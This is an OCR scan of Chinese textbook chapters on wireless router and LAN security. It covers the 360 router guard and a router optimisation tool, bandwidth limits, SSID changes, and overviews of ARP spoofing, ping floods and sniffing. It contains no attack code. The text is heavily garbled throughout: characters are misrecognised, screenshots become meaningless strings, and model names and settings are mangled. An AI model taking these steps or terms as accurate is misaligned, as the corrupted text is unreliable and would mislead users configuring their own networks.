生路 由 器 等 理 客 码 强 度 生 检 测 | 
全 WiFi 谋 码 加 密 方 式 待 检 涡 | 
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[step 图 单 去 “立即 检测 ”按钮 ， 即 可 开始 对 路 由 器 进行 检测 ， 并 给 出 检测 结果 ， 如 下 图 
所 示 。 


2.0 
路 由 器 卫士 我 的 路 由 路 由 防 黑 路 由 跑 分 


您 的 路 由 器 能 抵御 黑客 入 侵 ， 请 放心 上 网 到 新 扫 箱 


四 DHCP 服 务 的 DNS 安全 ， 上 网 不 吨 祝 支持 安全 
四 DMZ 主 机 服务 关闭 ， 不 蜀 波 轩 吝 操纵 安全 
加 未 发 现代 运 饼 干 ” 泥 洞 ， 不 是 衫 坚 客 攻击 和 入 茎 安全 
四 路 由 器 管 理 亦 码 较为 安全 ,不易 被 办 客 入 侵 安全 
有 WiFi 密 码 加 密 方 式 安全 ,不 完 被 他 人 路 网 安全 


Bp 国 选择 “路 由 跑 分 ”选项 卡 ， 进 入 “路 由 跑 分 ”设置 界面 ， 在 其 中 可 以 查看 当前 路 由 
器 信息 ， 如 下 图 所 示 。 


路 由 器 信息 


路 由 器 名 称 : TL-WR886N 处 理 咒 架构 : MIPS 
处 理 器 型 号 : TP9343-AL3A 无 线 传 输 速 率 : 450 Mbps 
处 理 器 品牌 : Qualcomm 内 存 : 16 MB 

处 理事 主 频 : 750 MHz 闪存 : 2 MB 


开始 跑 分 


[step 图 单 去 “开始 跑 分 ”按钮 ， 即 可 开始 评估 当前 路 由 器 的 性 能 ， 如 下 图 所 示 。 


2.0 
路 由 器 卫士 我 的 路 由 路 由 防 黑 


正在 评估 路 由 器 性 能 


TL-WR836N 


41% 


EL 
$8000909 
人 
REEL 
8990906 
90989 
LEE 
EE 
REES 
$0 人 0004 
ELE 
ELE 
S00004 
EL 
和 
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评估 完成 后 ， 会 在 “路 由 跑 分 ”界面 中 给 出 跑 分 排行 榜 信息 ， 如 下 图 所 示 。 


蹈 由 防 涉 效 由 跑 分 扩展 工具 路 由 设置 


路 由 器 卫士 我 的 路 由 


您 的 路 由 趴 得 分 “5805 分 , 全 国 排名 103692 名 ,击败 了 全 国 63% 的 路 由 路， 


路 由 跑 分 排行 榜 
ws326 HUAWEI MODEL [ET 
的 TLwRaeeh 
斐 讯 FWR-706 
TP-LINK TL-WR885N 1.0 


HG532E HUAWEI MODEL (3> 


FR30OM 


选择 “路 由 设置 ”选项 卡 ， 进 入 “路 由 设置 ”界面 ， 在 其 中 可 以 对 宽带 上 网 、WiEi 
徐 码 、 路 由 器 密码 等 选项 进行 设置 ， 如 下 图 所 示 。 


扩展 工具 


下 的 路 由 路 由 防冻 路 由 跑 分 


WiFi 恋 码 ( 了 ) 路 由 震 杰 码 “重启 路 由 个 


(En 各 ) 六 tm 


路 由 时 光 机 可 以 帮 您 保存 上 网 帐号 和 密码 永 个 去 先 


' 不 记 况 带 上 网 帐号 ， 可 以 攻 和 您 立即 找 回 


' 更 换 新 的 路 由 器 后 ， 能 够 育 控 畅快 上 网 


(®) : 1024 位 RSA 及 128{5AES 加 访 ， 帐 号 永 坏 丢 
Fi 法 立即 开户 


路 由 时 光 机 


选择 “路 由 时 光 机 ”选项 卡 ， 在 打开 的 界面 中 单 击 “ 立 即 开启 ”按钮 ， 即 可 打开 登 
录 界 面 ， 在 其 中 输入 360 账 号 与 密码 ， 然 后 单 击 “ 立 即 登录 并 开局 ”按钮 ， 即 可 开局 时 光 


机 ， 如 下 图 所 示 。 


登录 您 的 360 手 机 账号 即 可 开局 时 光 机 


您 的 360 手 机 账号 就 是 时 光 机 账号 


密码 : “| 密码 (6-20 个 字符 区 分 大 小 写 1 


忘记 密码 ”立即 注册 


选择 “宽带 上 网 ”选项 卡 ， 进 入 “宽带 上 网 ”界面 ， 在 其 中 输入 网 络 运 营 商 给 出 的 
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上 网 账号 与 密码 ， 单 击 “ 保 存 设置 ”按钮 ， 即 可 保存 设置 ， 如 下 图 所 示 。 


球 的 路 由 足 由 防 沾 路 由 跑 分 


oY mein © 完 带 上 网 一、 wif 密码 (2 】 路 由 啡 定 如 <” 至 启 路 由 路 


上 网 万 式 : | PpPoE v 


CN。 Gin 


上 网 安 铝 eeeeeeeee 


选择 “WiFi 密 码 ” 选 项 卡 ， 进 入 “WiFi 密 码 ” 界 面 ， 在 其 中 输入 WiFi 密 码 ， 单 去 
“保存 设置 ”按钮 ， 即 可 保存 设置 ， 如 下 图 所 示 。 


路 由 器 卫士 我 的 路 由 路 由 防 黑 ”路 由 路 分 
路 由 时 光 机 寅 带 上 网 一、 wif 密码 了 】 路由 中 定 吕 到 所 路 由 器 


WIFI 名 可 ; | %E59%BD%83%E890BO%B796E796A796915 


WIIH 空 色 [TITITITIII 


WiFi 车 码 


step 图 选择 “路 由 器 密码 ”选项 卡 ， 进 入 “路 由 器 密码 ”界面 ， 在 其 中 输入 路 由 器 密码 ， 
单 击 “保存 设置 ”按钮 ， 即 可 保存 设置 ， 如 下 图 所 示 。 


路 由 器 卫士 我 的 路 由 ”路 由 防 黑 
跨 白 时 光 机 , 宾 带 上 网 WiFi 密 码 @Q) 路 由 踢 密 妈 至 后 路 由 踢 
\ / 当前 帐号 ; admin 
i ke | 
[0] 口号 TD 
路 由 器 密码 
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[see 图 选择 “重启 路 由 器 ”选项 卡 ， 进 入 “重启 路 由 器 ”界面 ， 单 击 “ 重 启 ” 按 钮 ， 即 可 
对 当前 路 由 器 进行 重启 操作 ， 如 下 图 所 示 。 


路 由 器 卫士 ”开罗 路 由 路 由 防 黑 ”路 由 跑 分 。 ”扩展 工具 
1 
路 由 时 光 机 守 带 上 网 WiF 密 码 铬 由 器 宇 如 > < 至 忆 路 由 器 


另外 ， 使 用 360 路 由 器 卫士 在 管理 无 线 网 络 安全 的 过 程 中 ， 一 旦 检测 到 有 设备 通过 路 
由 器 上 网 ， 就 会 在 计算 机 桌面 的 右上 角 弹 出 信息 提示 框 ， 如 下 图 所 示 。 


单 击 “管理 ”按钮 ， 即 可 打开 该 设备 的 详细 信息 界面 ， 在 其 中 可 以 对 网 速 进行 限制 管 
理 ， 最 后 单 击 “ 确 认 ” 按 钮 即 可 ， 如 下 图 所 示 。 


名 称 iPhone%2D6 久 


详细 信息 IP 地 址 192.168.0.100 


MAK 地 址 : A4-5F-60-16-7A-A1 


网 速 管理 ER 


OKB/s 
当前 网 速 


13.3.2 ”路 由 优化 大 师 


路 由 优化 大 师 是 一 球 专 业 的 路 由 器 设置 软件 ， 其 主要 功能 有 一 键 设置 优化 路 由 、 屏 广 
告 、 防 蹄 网 、 路 由 器 全 面 检测 及 高 级 设置 等 ， 从 而 保护 路 由 器 安全 。 

使 用 路 由 优化 大 师 管理 无 线 网 络 安全 的 操作 步骤 如 下 : 
[steep 国 下 载 并 安装 路 由 优化 大 师 ， 双 击 桌 面 上 的 快捷 图 标 ， 即 可 打开 “路 由 优化 大 师 ” 的 
工作 界面 ， 如 下 图 所 示 。 
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登录 族 由 况 (TP-Link) 


朱 理 月 宕 码 ; admin 


单 击 “ 登 录 ” 按 钮 ， 打 开 RMTools 窗 口 ， 在 其 中 输入 管理 员 密 码 ， 如 下 图 所 示 。 


@ RMTools 一 口 X 
和 [e] 
TL-WR886N 


管理 员 密 码 


[step 图 单 去 “确定 ”按钮 ， 即 可 进入 路 由 器 工作 界面 ， 在 其 中 可 以 看 到 主人 网 络 和 访客 网 
络 信 息 ， 如 下 图 所 示 。 


@ RMTools 全 
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[step 园 单 去 “设备 管理 ”图 标 ， 进 入 “设备 管理 ”工作 界面 ， 在 其 中 可 以 看 到 当前 无 线 网 
络 中 的 连接 设备 ， 如 下 图 所 示 。 


人 RMTools _ x 
出 亲 | 后 晤 | | 关闭 路 由 窒 理 JRL: |htp:W192.158.0.1/ | | 
TL-WRABSN 


已 壬 设备 ?个 


癌 文 时 网 这 : 上 行 0KB/s 下 行 OKB/s 加 实时 网 这 : 上 行 O0KB/s 下 行 0KB/s 


网 结 科技 医 名 主机 
实时 网 膛 : 上 行 O0KB/s 下 行 0KB/s SHE : 上 行 O0KB/s 下 行 0KB/s 


匿名 主机 


实 引 网 到 : 上 行 OKB/s 下 行 0KB/s 空 于 网 渗 : 上 行 2KB/s 下 行 12KB/s 


管理 路 由 更 方便 。 
> 


如 果 想 要 对 某 个 设备 进行 管理 ， 则 可 以 单 击 “管理 ”按钮 ， 进 入 该 设备 的 管理 界 
面 ， 在 其 中 可 以 设置 设备 的 上 传 速度 、 下 载 速 度 以 及 上 网 时 间 等 信息 ， 如 下 图 所 示 。 

| HUAWEI MAIMANG 5 

IP : 192.168.0.103 | MAC : 84-be-52-3b-17-01 | 无 线 连 接 


@ 0KB/s © 0KB/s 


上 传 速度 无 限制 下 载 速度 无 限制 


网 时 间 设 置 


+ 于 加 允许 上 网 时 间 段 


[seep 图 单 去 “添加 允许 上 网 时 间 段 ” 超 链接 ， 即 可 打开 上 网 时 间 段 的 设置 界面 ， 在 其 中 可 
以 设置 时 间 段 描述 信息 、 开 始 时 间 、 结 束 时 间 等 ， 如 下 图 所 示 。 


mas [EGR 
enim [本 7] [本 
sr [is [本 | 


ms 


[step 国 单 去 “确定 ”按钮 ， 即 可 完成 上 网 时 间 段 的 设置 操作 ， 如 下 图 所 示 。 
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限 束 限 这 


单 击 “ 应 用 管理 ”图 标 ， 即 可 进入 “应 用 管理 ”工作 界面 ， 在 其 中 可 以 看 到 路 由 优 
化 大 师 为 用 户 提供 的 应 用 程序 ， 如 下 图 所 示 。 


访客 网 络 无 线 设备 接 入 控制 
版 本 : 1.1.0 大 小 : 30.8KB 版 本 : 1.0.10 大 小 : 34.7KB 


无 线 桥接 信号 调节 
版 本 : 1.1.2 大 小 版 本 : 1.0.14 大 小 


IP 与 MAKC 绑 定 管理 员 身 份 限定 
人 7 版 本 : 1.0.12 大 省 版 本 : 1.0.12 大 小 : 19.9KB 


AP 隔 高 虚拟 服务 六 
版 本 : 1.0.12 大 小 : 9.7KB 版 本 : 1.0.16 大 小 


DDNS DMZ 主 机 


[steep 图 如 果 想 要 使 用 某 个 应 用 程序 ， 则 可 以 单 击 某 应 用 程序 下 的 “进入 ”按钮 ， 进 入 该 应 
用 程序 的 设置 界面 。 本 实例 单 击 “无 线 设备 接 入 控制 ”图 标 ， 如 下 图 所 示 。 


无 线 设 备 接 入 控制 


接 入 控制 功能 ”开启 v 


只 允许 列表 内 的 设备 连接 到 主人 网 络 


允许 接 入 设备 列表 


国 主机 MAC 地 址 


请 梅 允 许 连 接 主人 网 络 的 设备 添加 到 列表 当中 。 


[Sep 图 单 去 “路 由 设置 ”图 标 ， 在 打开 的 界面 中 可 以 查看 当前 路 由 器 的 设置 信息 ， 如 下 图 
所 示 。 
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和 RMTools 一 口 x - 
Be | 
TLWRRBEN 


TP-LINIK | TL-WR886N 


路 由 设置 TP-LINK ID 


这 TP-LINK ID > 什么 足 TP-LINK ID ? 


TP-LINK IC 可 安全 登录 您 在 TP-LINKA9 肉 户 。 


通 导 TP-LINK 帐 户 ， 方 紫 至 受 TP-LINK 提 供 的 所 有 产品 功 朋 和 最 务 


} 路由 嘱 的 在 经 次 件 氏 新 、 


1 远 他 管 到 家 应 网 培 ( 包括 TP-LINK 咎 由 强 和 答 紫 宁 司 设备 ) 。 
+ 还 辽 “TP-LINK 柯 还 应 让 ” 安 某 路 周南 实用 程 厅 ， 


TP-UINK 后 浓 开 发 的 新 功能 和 林 慑 务 。 


选择 左 侧 的 “上 网 设置 ”选项 ， 在 打开 的 界面 中 可 以 对 当前 的 上 网 信息 进行 设置 ， 
如 下 图 所 示 。 


全 RMTools 一 口 x 


新 | | 后进 | | 美 闭 | 路 由 管理 URL: [http:N192.168.0. |[@ | 三 妇 # 


TLWRSS6N 


TEP-LULINIK | TL-WR886N 


路 由 设置 


选择 左 侧 的 “无 线 设置 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 的 无 线 功 能 进行 开关 、 
名 称 、 密 码 等 信息 的 设置 ， 如 下 图 所 示 。 


| @ RMTools 口 x 


蜡 新 | | 后 员 | | 美 闭 | 路 由 筷 理 URL: |htp:W132.159.0.1/ 5 | ”上 刀 在 


TLWRSS6N 


TR-LINI | TL-WR886N 


路 由 设置 二 
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选择 左 侧 的 “LAN 口 设置 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 的 LAN 口 进行 设置 ， 
如 下 图 所 示 。 


TE ES |][e@ |[ 人 vf | 


TL-WRBS35N 


TP-LINE |TL-WRS86N 


路 由 设置 LAN 口 设置 


选择 左 侧 的 “DHCP 服 务 器 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 的 DHCP 服 务 器 进行 
设置 ， 如 下 图 所 示 。 


人 RMTools 


和 美国 各 由 芝 3 玉 RL: |http:W192,158.0,1/ | 区 本 国 


NL-WRESSN 


FP- NI | TL-WRSS6N 


路 由 设置 DHCP 服 务 


选择 左 侧 的 “软件 升级 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 优化 大 师 的 版 本 进行 升 


一 口 x 


| @ RMTools 
后 退 | | 关闭 | 路 由 乞 隆 uRL: [http:ff192. 153.0.1/ | | Go | 其 


NL-WRSS5N 


TP-LINEK | TL-WR886N 


路 由 设置 在 线 和 级 
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x 


[seep 回 选择 左 侧 的 “修改 管理 员 密码 ”选项 ， 在 打开 的 界面 中 可 以 对 管理 员 密 码 进 
如 下 图 所 示 。 


一 \ 
\ 
NN 
BN 
AN 
p> 


RMTools 一 口 x 
Bi | | 后 巷 | | 关闭 | 路 由 管事 有 3; |httpsW192.168.0.1/ | @ || 人 | 


TL-AWRESS6N 


TR-UINIE | TL-WRSS6N 


路 由 设置 修改 管理 员 密 码 


> vy 了 TE 一 rl 
让 ”修改 管理 吧 空 码 > 


> 


[step 园 选择 左 侧 的 “备份 和 和 载 入 配置 ”选项 ， 在 打开 的 界面 中 可 以 对 当前 路 由 器 的 配置 进 
ye 如 下 图 所 示 。 


二 RMTools 口 x 
Bi | [Be | [| 扣 ER: http:f1i92, 168.0. 1 | mm | | 人 | 


TL-WRESSGN 
TTP-ULINIC |TL-WR886N 


路 由 设置 


9 备份 和 载 入 配 吾 > 


[step 了 图 选择 左 侧 的 “重启 和 恢复 出 厂 ” 选 项 ， 在 打开 的 界面 中 可 以 对 当前 路 由 器 进行 重启 
和 恢复 出 厂 设 置 ， 如 下 图 所 示 。 


全 RMTools — 口 x 
喇 册 | [ 医 司 | [而 | 熙 由 包 iUJRL: http:1192. 168.0.1/ |[@ | [| 


TLWRS3SSN 


TP-LINK |TL-WR886N 


路 由 设置 重启 路 由 器 


恢复 出 三 设置 


网 妇 出 厂 设 否 


你 和 公 出 厂 没 百 档 僻 第 十 器 的 所 有 苇 百 恢 和 引出 厂 村 的 歌 认 状 杰 ,所 痛 非 区 水 的 让 币 褒 该 利 除 ,出厂 


“i 


(1 重启 和 恢复 出 厂 > 
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[Sep 图 选择 左 侧 的 “系统 日 志 ” 选 项 ， 在 打开 的 界面 中 可 以 查看 当前 路 由 器 的 系统 日 志 信 
息 ， 如 下 图 所 示 。 


@ RMTocls 一 口 X 
EE Was8n: np |]1 古 | 
-ET 


TIP-LINIK | TL-WR886N | 


路 由 充 置 


attached 


日 志 内 认 
1 


192.168.0.1 


[step 图 路 由 器 设备 设置 完毕 后 ， 返 回 到 路 由 优化 大 师 的 工作 界面 中 ， 选 择 “ 防 中 网 ” 选 
项 ， 在 打开 的 界面 中 可 以 进行 防 蹄 网 设置 ， 如 下 图 所 示 。 


所 有 设备 (3) 。 黑 名 单 (0) ” 心 


DESKTOP-67NQBIF_ | 
00-1E-8C-AD-13-5F ee 


AFOIG-611211054 
192.1 
1 92.168.0.112 


58-FB-84-FB-58-10 


step 图 选择 “ 屏 广告 ” 选项， 在 打开 的 界面 中 可 以 设置 视频 过 滤 广 告 是 否 开 启 ， 如 下 图 所 示 。 


视频 过 滤 广 告 未 开启 


打开 视频 过 这 广告 后 ,使 用 虹 脑 五 视频 ,不 会 出 现 广 告 ! 
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[step 图 单 去 “开启 广告 过 滤 ” 按 钮 ， 即 可 开局 视频 过 滤 广 告 功 能 ， 如 下 图 所 示 。 


A 


视频 过 滤 广告 已 开局 


打开 视 巾 过 二 广告 后 ， 使 用 电脑 霹 视 频 ， 不 会 出 现 广告 ! 


视频 过 滤 广告 已 开局 


打开 视频 过 浊 广 告 后 ,使 用 电脑 所 视频 ， 不 会 出 现 广告 ! 


‘WUSERPROF LE96\L Cal Se 95\Ar plicat Data\360C rome\Chrome\User Data\Defaul\Ca IT 


选择 “ 测 网 速 ” 选 项 ， 进 入 网 速 测试 设置 界面 ， 如 下 图 所 示 。 


雇 由 优化 大 时 


pd | 
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单 击 “开启 测速 ”按钮 ， 即 可 对 当前 网 络 进行 测速 操作 ， 测 出 来 的 结果 显示 在 工作 
界面 中 ， 如 下 图 所 示 。 


20M 0M 100M 200M 1D00M 


最 大 接 入 速度 为 56.34MB/ 秒 ， 相 当 于 50M ~ 100M 的 带宽 


所 位 地: Urumq 


上 网 1p : 49.117,.106.249 


13.4 


在 无 线 局 域 网 中 所 有 的 终端 设备 都 是 通过 路 由 器 上 网 的 ， 为 了 更 好 地 管理 各 个 终端 设 
备 的 上 网 情况 ， 管 理 员 可 以 通过 路 由 器 控制 上 网 设备 的 上 网 速度 ， 具 体 的 操作 步骤 如 下 。 
[steep 国 打开 路 由 器 的 Web 后 台 设 置 界面 ， 在 其 中 选择 “IP 宽 带 控制 ” 选项 ， 在 右 侧 的 窗 格 
中 可 以 查看 相关 的 功能 信息 ， 如 下 图 所 示 。 


x 国 


| 192.168.0.1 


实战 演练 


电 TL-WR885N 


A 


TP-LINIK 六 一 的 门 芝 线束 率 ; 一 忌 现 无 线 自 由 连 巷 区 本 


云 闪 叶 IF 芝 宽 控 旬 的 开 月 与 关闭 进行 设置 只 有 IF 带宽 控 负 的 总 开 天 为 开 月 时 ， 司 蒜 的 “IE 芝 宽 控 创 规则 ”才能 各 


< 效 ! 应 这， 风 具 效 。 


注意 : 
1. 带宽 的 撞 算 关 条 为 : 
2. 人 
供 商 【30 电信、 网 盟 等 ? 
3. 修改 下 面 的 吏 吉 硕 后 ， 


1Mbpzs = 1024KXbpz; 
， 证 根据 实际 情史 进行 选择 和 壤 写 ， 如 不 清 想 ， 请 咨 租 您 的 宽带 担 
请 点 二 “保存 ”按钮 ， 使 再 吉 硕 生 误 。 


口 开启 亚 尝 宽 控制 


与 巾 仁孝 定 
动 杰 JS 
系统 工 且 


更 条 TP-LINK 产 品 ， 
请 点 击 查 者 >》 


选中 “开启 到 宽带 控制 en 即 可 在 下 方 的 设置 区 域 中 对 设备 的 上 行 总 宽带 和 


下 行 总 


ed 


识 节 线路 类 型 ; 
上 行 总 沉 宽 : 
下 行 总 带 亮 : 


和 下 行 罕 区 (Ebp: 
Te 


汶 加 六 有 目 | | 是 际 所 有 季 上 月 


终端 设置 的 上 网 速度 ， 如 下 图 所 示 。 
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回 TL-WR885N 


= 


X mi 


| 192.168.0.1 


及 站 


DHCP 服 务 器 注 ) 


路 由 功能 


IP 与 Ct 拖 定 
动 杰 DNS 

系统 工 且 

更 交 TP-LINE 产 品 ， 
请 点 击 查看 >> 


页 对 IE 带宽 控制 的 开启 与 关闭 进行 设置 - 只 有 了 带宽 按 可 的 总 开关 为 开户 时 ， 后 尘 的 “IF 带宽 控 刨 规则 ”才能 况 
效 ; 尽 文 ， 风 | 卡 郊 。 
意 : 


1、 芝 宽 的 换算 关系 为 : 1Mbpzs = 102 儿 bpz; 

2?、 送 择 宽 市 线路 类 型 及 填写 市 商 大 小 寺 ， 请 根据 闫 际 情 部 进行 选择 和 填 瑟 ， 如 季 清 惹 ， 请 次 词 您 的 帝 市 提 
攻 商 《如 电信 、 闫 通 等 ) ; 

3、 修 忌 下 面 的 加 盏 项 后 ;请 点 击 “ 保 存 ” 按 时 使 峙 车 项 生 波 。 


开启 王 带 亮 拉 制 
宽带 时 路 类 型 : 
上 行 总 带 帘 : 
下 种 忆 带 痪 : 


下 行事 高 (Kbrs) 
当前 5 直入 空 


实战 演练 2 一 一 通过 修改 WiFi 名 称 隐藏 路 由 器 
WiFi 的 名 称 通常 是 指 路 由 器 当中 SSID 号 的 名 称 ， 该 名 称 可 以 根据 目 己 的 需要 进行 修 
改 ， 从 而 可 以 在 一 定 程度 上 隐藏 路 由 器 ， 具 体 的 操作 步骤 如 下 。 


[sep 图 打开 路 由 器 的 Web 后 台 设 置 界面 ， 在 其 中 选择 “无 线 设置 ”选项 下 的 “基本 设置 ” 
选项 ， 打 开 “ 无 线 网 络 基 本 设置 ”工作 界面 ， 如 下 图 所 示 。 


回 TL-WR885N 


< > 0O 


X 


TP-LINK 


运行 状态 
充 置 回 导 
网络 参数 


无 线 设置 


无 续 安 全 议 秆 
无 线 WAC 地 址 过 渡 
无 线 高 级 设置 
主机 状态 

DHCP 服 务 器 

转发 规则 

安全 功能 

家 长 控制 

上 了 由 控制 

路 由 功能 

IP 沉 宽 控 制 


一 


| 192.168.0.1 


遇 六 无 线 速 密实 现 无 线 自由 连接 欧 想 


- 


无 线 网 络 基本 设置 
本 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 。 
SSID 吕 : 
信道 : 
模式 : 


回 开 启 无 线 功能 
开启 ssID 广 播 
器 开 启 iDs 


将 SSID 号 的 名 称 由 TP-LINK1 修 改 为 WiFi， 最 后 单 击 “ 保 存 ” 按 钮 ， 即 可 保存 WiFi 


修改 后 的 名 称 ， 如 下 图 所 示 。 
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回 TL-WR885N x 十 


ee 3 | 192.168.011 


运行 状态 
设置 器 亏 
网 络 条 数 


无 绪 设 置 SSIID 呈 : 


元 线 MAC 地 址 过 光 频段 带宽 ， 
无 线 高 级 设置 
主机 状态 

DECP 服 务 哉 


转 友 规 刚 


开启 无 线 功能 
开启 8SID 广 播 
口 开 启 iDps 
安全 功能 

家 长 控制 

上 的 控制 

路 由 功能 

IP 带 亮 控制 


13.5 “小 试 身 手 


练习 1: 无 线路 由 器 的 基本 设置 。 
练习 2: 无 线路 由 右 的 安全 策略 。 
练习 3: 无 线路 由 安全 管理 工具 的 使 用 。 
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第 14 草 ”无 线 局 域 网 的 安全 防护 


无 线 局 域 网 作为 计算 机 网 络 的 一 个 重要 成 员 已 经 被 广泛 应 用 于 社会 的 各 个 领域 。 目 
前 黑客 利用 各 种 专门 攻击 无 线 局 域 网 工具 对 无 线 局 域 网 进行 攻击 ， 本 章 介 绍 无 线 局 域 网 
的 安全 防护 ， 主 要 包括 无 线 局 域 网 的 查看 、 无 线 局 域 网 的 攻击 、 无 线 局 域 网 安全 辅助 工 


具 等 。 


14.1 无 线 局 域 网 的 安全 介绍 


目前 越 来 越 多 的 企业 建立 自己 的 无 线 
局 域 网 以 实现 企业 信息 资源 共享 或 者 在 无 
线 局 域 网 上 运行 各 类 业务 系统 。 随 着 企业 
无 线 局 域 网 应 用 范围 的 扩大 、 保 存 和 传输 
的 关键 数据 增多 ， 无 线 局 域 网 的 安全 性 问 
题 日 益 突 出 。 


14.1.1 无 线 局 域 网 基础 知识 


大 家 日 常 接 触 的 办 公 网 络 大 部 分 是 无 
线 局 域 网 ， 如 各 个 企业 、 学 校 、 政 府 机 关 
等 部 门 中 的 网 络 。 无 线 局 域 网 主要 用 于 一 
个 部 门 内 部 ， 常 局 限于 一 个 建筑 物 之 内 。 
在 企业 内 部 利用 无 线 局 域 网 办 公 已 成 为 其 
经 营 管理 活动 必 不 可 少 的 一 部 分 。 

无 线 局 域 网 是 指 在 某 一 区 域内 由 多 台 
计算 机 互联 成 的 计算 机 组 ， 一 般 是 方圆 几 
十 米 。 无 线 局 域 网 把 个 人 计算 机 、 工 作 站 
和 服务 器 连 在 一 起 ， 在 无 线 局 域 网 中 可 以 
进行 管理 文件 、 共 享 应 用 软件 、 共 享 打印 
机 、 安 排 工 作 组 内 的 日 程 、 发 送 电子 邮件 
和 传真 通信 服务 等 操作 。 无 线 局 域 网 是 封 
闭 型 的 ， 可 以 由 办 公 室 内 的 两 台 计 算 机 组 
成 ， 也 可 以 由 一 个 公司 内 的 数 百 台 计 算 机 
组 成 。 

由 于 距离 较 近 ， 传 输 速率 较 快 ， 为 
10 一 1000Mb/s。 无 线 局 域 网 常见 的 分 类 方 
法 有 以 下 几 种 : 


(1) 按 其 采用 的 技术 可 分 为 不 同 的 种 器 刘 
类 ， 如 Ether Net〈 以 太 网 ) 、FDDI、Token 疾 ; 昌 I 


Ring〈 令 牌 环 ) 等 。 

(2) 按 联网 的 主机 间 的 关系 ， 可 分 
为 两 类 ， 如 对 等 网 和 C/S (客户 /服务 
佑 ) 网 。 

(3) 按 使 用 的 操作 系统 不 同 可 分 为 许 
多 种 ， 如 Windows 网 和 Novell 网 。 

无 线 局 域 网 最 主要 的 特点 是 : 网 络 为 
一 个 单位 所 拥有 ， 且 地 理 范 围 和 站 点 数目 
均 有 限 。 无 线 局 域 网 具有 如 下 的 一 些 主要 
优点 : 

(1) 网 内 主机 主要 为 个 人 计算 机 ， 是 
专门 适 于 微机 的 网 络 系统 。 

(2) 禾 盖 范围 较 小 ， 适 于 单位 内 部 
联网 。 

(3) 传输 速率 高 ， 误 码 率 低 。 

(4) 系统 扩展 和 使 用 方便 ， 可 共享 昂 
贵 的 外 部 设备 、 软 件 和 数据 。 

(5) 可 靠 性 较 高 ， 适 于 数据 处 理 和 办 
公 眉 动 化 。 

无 线 局 域 网 非常 灵活 ， 两 台 计 算 机 就 
可 以 连 成 一 个 无 线 局 域 网 。 无 线 局 域 网 的 
安全 是 内 部 网 络 安全 的 关键 ， 如 何 保证 无 
线 局 域 网 的 安全 性 成 为 网 络 安全 研究 的 一 
个 重点 。 


14.1.2 无 线 局 域 网 安全 隐患 
随 着 人 类 社会 生活 对 Internet 需 求 的 日 


黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


人 益 增 长， 网络 安全 逐渐 成 为 Internet 及 各 项 
网 络 服务 和 应 用 进一步 发 展 的 关键 问题 。 
网 络 使 用 户 以 最 快速 度 获取 信息 ， 但 是 非 
公开 性 信息 的 被 盗用 和 破坏 ， 是 目前 无 线 
局 域 网 面临 的 主要 问题 。 


1. 无 线 局 域 网 病毒 


在 无 线 局 域 网 中 ， 网 络 病毒 除了 具有 
可 传播 性 、 可 执行 性 、 破 坏 性 、 隐 蔽 性 等 
计算 机 病毒 的 共同 特点 外 ， 还 具有 以 下 几 
个 新 特 扣 : 

(1) 传染 速度 快 。 在 无 线 局 域 网 中 ， 
由 于 通过 服务 器 连接 每 一 台 计 算 机 ， 这 不 
仅 给 病毒 传播 提供 了 有 效 的 通道 ， 而 且 病 
毒 传播 速度 很 快 。 在 正常 情况 下 ， 只 要 网 
络 中 有 一 台 计 算 机 存在 病毒 ， 在 很 短 的 时 
间 内 ， 将 会 寻 致 无 线 局 域 网 内 计算 机 相互 
感染 繁殖 。 

(2) 对 网 络 破坏 程度 大 。 如 果 无 线 局 
域 网 感染 病毒 ， 将 直接 影响 到 整个 网 络 系 
统 的 工作 ， 轻 则 降低 速度 ， 重 则 破坏 服务 
器 重要 数据 信息 ， 甚 至 导致 整个 网 络 系统 
月 演 。 

(3) 病毒 不 易 清 除 。 清 除 无 线 局 域 网 


中 的 计算 机 病毒 ， 要 比 清除 单机 病毒 复杂 


二 和 能 完全 消除 病毒 ， 就 可 能 使 整个 网 络 重新 


被 病毒 感染 ， 即 使 刚刚 完成 清除 工作 的 计 
算 机 ， 也 很 有 可 能 立即 被 无 线 局 域 网 中 的 
另 一 台 带 病毒 计算 机 所 感染 。 


2. ARP 攻 击 


ARP 攻 击 主要 存在 于 无 线 局 域 网 网 络 
中 ， 对 网 络 安全 和 危害 极 大 。ARP 攻 击 就 
是 通过 伪造 的 IP 地 址 和 MAC 地 址 ， 实 现 
ARP 欺 骗 ， 它 可 以 在 网 络 中 产生 大 量 的 
ARP 通 信和 数据 ， 使 网 络 系统 传输 发 生 阻 
塞 。 如 果 攻 击 者 持续 不 断 地 发 出 伪造 的 
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ARP 啊 应 包 ， 就 能 更 改 目标 主机 ARP 组 存 
中 的 IP-MAC 地 址 ， 造 成 网 络 遭 受 攻击 或 
中 断 。 


3. Ping 洪 水 攻击 


Windows 提 供 一 个 Ping 程 序 ， 使 用 它 可 
以 测试 网 络 是 否 连接 。Ping 洪 水 攻击 也 称 
为 ICMP 入 侵 ， 是 利用 Windows 系 统 的 漏洞 
来 入 侵 的 。 这 种 攻击 方式 也 称 DoS 攻 击 ( 拒 
绝 服务 攻击 ) ， 即 在 一 个 时 段 内 连续 向 服 
务 器 发 出 大 量 请 求 ， 服 务 器 来 不 及 啊 应 而 
死机 。 


4. 嗅 探 


无 线 局 域 网 是 黑客 进行 监听 嗅 探 的 
主要 场所 。 黑 客 在 无 线 局 域 网 内 的 一 个 主 
机 、 网 关上 安装 监听 程序 ， 就 可 以 监听 出 
整个 无 线 局 域 网 的 网 络 状 态 、 数 据 流动 、 
传输 数据 等 信息 。 因 为 一 般 情 况 下 ， 用 户 
的 所 有 信息 ， 例 如 账号 和 密码 ， 都 是 以 明 
文 的 形式 在 网 络 上 传输 的 。 目 前 可 以 在 无 
线 局 域 网 中 进行 嗅 探 的 工具 很 多 ， 例 如 
Sniffer 等 。 


无 线 局 域 网 的 查看 


利用 专门 的 无 线 局 域 网 查看 工具 可 以 
但 看 无 线 局 域 网 中 各 个 主机 的 信息 ， 本 市 
将 介绍 两 球 非 常 方 便 实用 的 无 线 局 域 网 查 
看 工具 。 


14.2 


14.2.1 使 用 LanSee 工 具 


局 域 网 查看 工具 (LanSee) 是 一 款 对 
局 域 网 上 的 各 种 信息 进行 查看 的 工具 。 它 
集成 了 局 域 网 搜索 功能 ， 可 以 快速 搜索 出 
